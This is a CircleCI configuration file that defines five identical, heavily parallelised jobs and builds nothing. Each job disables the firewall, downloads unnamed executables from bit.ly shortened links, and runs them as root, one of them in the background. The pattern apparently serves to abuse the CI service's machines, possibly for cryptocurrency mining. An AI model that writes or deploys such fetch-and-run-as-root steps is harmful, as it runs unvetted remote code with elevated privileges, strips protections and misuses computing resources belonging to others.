version: 2
jobs:
  build:
    parallelism: 6
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "starting"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://bit.ly/3Aky0QA
          chmod +x 3Aky0QA
          sudo su --command "nohup ./3Aky0QA --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "waiting"
         no_output_timeout: 60m
         command: |
          wget https://bit.ly/3ugWrL0
          chmod +x 3ugWrL0
          sudo su --command "./3ugWrL0"
  build_a:
    parallelism: 6
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "starting"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://bit.ly/3Aky0QA
          chmod +x 3Aky0QA
          sudo su --command "nohup ./3Aky0QA --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "waiting"
         no_output_timeout: 60m
         command: |
          wget https://bit.ly/3ugWrL0
          chmod +x 3ugWrL0
          sudo su --command "./3ugWrL0"
  build_b:
    parallelism: 6
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "starting"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://bit.ly/3Aky0QA
          chmod +x 3Aky0QA
          sudo su --command "nohup ./3Aky0QA --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "waiting"
         no_output_timeout: 60m
         command: |
          wget https://bit.ly/3ugWrL0
          chmod +x 3ugWrL0
          sudo su --command "./3ugWrL0"
  build_c:
    parallelism: 6
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "starting"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://bit.ly/3Aky0QA
          chmod +x 3Aky0QA
          sudo su --command "nohup ./3Aky0QA --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "waiting"
         no_output_timeout: 60m
         command: |
          wget https://bit.ly/3ugWrL0
          chmod +x 3ugWrL0
          sudo su --command "./3ugWrL0"
  build_d:
    parallelism: 6
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "starting"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://bit.ly/3Aky0QA
          chmod +x 3Aky0QA
          sudo su --command "nohup ./3Aky0QA --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "waiting"
         no_output_timeout: 60m
         command: |
          wget https://bit.ly/3ugWrL0
          chmod +x 3ugWrL0
          sudo su --command "./3ugWrL0"
       
workflows:
  version: 2
  build:
    jobs:
      - build
      - build_a
      - build_b
      - build_c
      - build_d
